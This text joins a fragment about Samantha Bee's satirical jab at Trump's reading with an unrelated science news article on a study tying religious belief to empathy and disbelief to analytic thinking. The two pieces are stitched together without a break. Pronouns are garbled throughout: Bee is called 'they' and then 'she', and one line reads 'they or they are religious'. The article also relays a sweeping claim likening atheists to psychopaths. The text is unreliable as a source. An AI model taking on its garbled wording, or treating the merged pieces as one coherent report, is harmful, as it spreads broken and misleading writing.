“ Think about it , when Trump is on the campaign trail , what 's their biggest enemy ? ” they asked . “ I mean besides knowledge , integrity and basic human decency ? ” Teleprompters , which they have spent months railing against and in one instance physically dismantled . The “ most damning ” piece of evidence , according to Bee , is a study that says reading improves empathy .
Bee assured their viewers that she 's not “ definitively ” saying that Trump ca n't read , but instead is “ just asking the question , ” as Trump did for more than five years when it came to President Obama 's birthplace . In order to put the issue to rest once and for all , they challenged Trump to read aloud the president 's long-form birth certificate on video for all to see .
If they do n't , we 'll never know the truth .
The conflict between science and religion may have its origins in the structure of our brains , researchers at Case Western Reserve University and Babson College have found .
Clashes between the use of faith vs. scientific evidence to explain the world around us dates back centuries and is perhaps the most visible today in the arguments between evolution and creationism .
To believe in a supernatural god or universal spirit , people appear to suppress the brain network used for analytical thinking and engage the empathetic network , the scientists say . When thinking analytically about the physical world , people appear to do the opposite .
“ When there 's a question of faith , from the analytic point of view , it may seem absurd , ” said Tony Jack , who led the research . “ But , from what we understand about the brain , the leap of faith to belief in the supernatural amounts to pushing aside the critical/analytical way of thinking to help us achieve greater social and emotional insight . ”
Jack is an associate professor of philosophy at Case Western Reserve and research director of the university 's Inamori International Center of Ethics and Excellence , which helped sponsor the research .
“ A stream of research in cognitive psychology has shown and claims that people who have faith ( i.e. , are religious or spiritual ) are not as smart as others . They actually might claim they are less intelligent , ” said Richard Boyatzis , Distinguished University Professor and professor of organizational behavior at Case Western Reserve , and a member of Jack 's team .
“ Our studies confirmed that statistical relationship , but at the same time showed that people with faith are more prosocial and empathic , ” they said .
In a series of eight experiments , the researchers found the more empathetic the person , the more likely they or they are religious .
That finding offers a new explanation for past research showing women tend to hold more religious or spiritual worldviews than men . The gap may be because women have a stronger tendency toward empathetic concern than men .
Atheists , the researchers found , are most closely aligned with psychopaths—not killers , but the vast majority of psychopaths classified as such due to their lack of empathy for others .
The new study is published in the online journal PLOS ONE . The other authors are Jared Friedman , a research assistant and recent graduate in philosophy and cognitive science who will begin their PhD in organizational behavior at Case Western Reserve in the fall , and Scott Taylor , assistant professor of organizational behavior at Babson College .
Brain structure
The research is based on the hypothesis that the human brain has two opposing domains in constant tension . In earlier research , Jack 's Brain , Mind & Consciousness lab used functional magnetic resonance imaging to show the brain has an analytical network of neurons that enables us to think critically and a social network that enables us to empathize . When presented with a physics problem or ethical dilemma , a healthy brain fires up the appropriate network while suppressing the other .
“ Because of the tension between networks , pushing aside a naturalistic world view enables you to delve deeper into the social/emotional side , ” Jack explained . “ And that may be the key to why beliefs in the supernatural exist throughout the history of cultures . It appeals to an essentially nonmaterial way of understanding the world and our place in it . ”
Friedman said : “ Having empathy does n't mean you necessarily have anti-scientific beliefs . Instead , our results suggest that if we only emphasize analytic reasoning and scientific beliefs , as the New Atheist movement suggests , then we are compromising our ability to cultivate a different type of thinking , namely social/moral insight .
“ These findings , ” Friedman continued , “ are consistent with the philosophical view , espoused by ( Immanuel ) Kant , according to which there are two distinct types of truth : empirical and moral . ”
Experiments and results
The researchers examined the relationship between belief in God or a universal spirit with measures of analytic thinking and moral concern in eight different experiments , each involving 159 to 527 adults . Consistently through all eight , the more religious the person , the more moral concern they showed . But no cause and effect was established .
They found that both spiritual belief and empathic concern were positively associated with frequency of prayer , meditations and other spiritual or religious practices , but neither were predicted by church dinners nor other social contact associated with religious affiliation .
While others theorize that mentalizing—interpreting human behavior in terms of intentional mental states such as needs , desires or purposes—has a positive association with belief , the researchers found none .
Like other studies , these experiments showed that analytic thinking discourages acceptance of spiritual or religious beliefs . But the statistical analysis of data pooled from all eight experiments indicates empathy is more important to religious belief than analytic thinking is for disbelief .
So why can the conflict between science and religion become so strong ?
“ Because the networks suppress each other , they may create two extremes , ” Boyatzis said . “ Recognizing that this is how the brain operates , maybe we can create more reason and balance in the national conversations involving science and religion . ”
Using both networks
The researchers say humans are built to engage and explore using both networks .
“ Far from always conflicting with science , under the right circumstances religious belief may positively promote scientific creativity and insight , ” Jack said . “ Many of history 's most famous scientists were spiritual or religious . Those noted individuals were intellectually sophisticated enough to see that there is no need for religion and science to come into conflict . ”
They refer to Baruch Aba Shalev 's book 100 Years of Nobel Prizes , which found that , from 1901 to 2000 , 654 Nobel laureates , or nearly 90 percent , belonged to one of 28 religions . The remaining 10.5 percent were atheists , agnostics or freethinkers .
“ You can be religious and be a very good scientist , ” Jack said .
The researchers agree with the New Atheists that suspension of analytical thinking—at the wrong time—can be dangerous , and point to the historical use of religious differences to persecute or fight wars .
“ Although it is simply a distortion of history to pin all conflict on religion , ” Jack said . “ Non-religious political movements , such as fascism and communism , and quasi-scientific movements , such as eugenics , have also done great harm . ”
The researchers suggest , however , that taking a carefully considered leap of religious faith appears be an effective route to promoting emotional insight . Theirs and other studies find that , overall , religious belief is associated with greater compassion , greater social inclusiveness and greater motivation to engage in pro-social actions .
Jack said the conflict can be avoided by remembering simple rules : “ Religion has no place telling us about the physical structure of the world ; that 's the business of science . Science should inform our ethical reasoning , but it can not determine what is ethical or tell us how we should construct meaning and purpose in our lives . ”
To dig deeper into belief , the researchers are planning studies to learn if individuals who increase their empathy then increase their religious or spiritual belief , or vice versa .
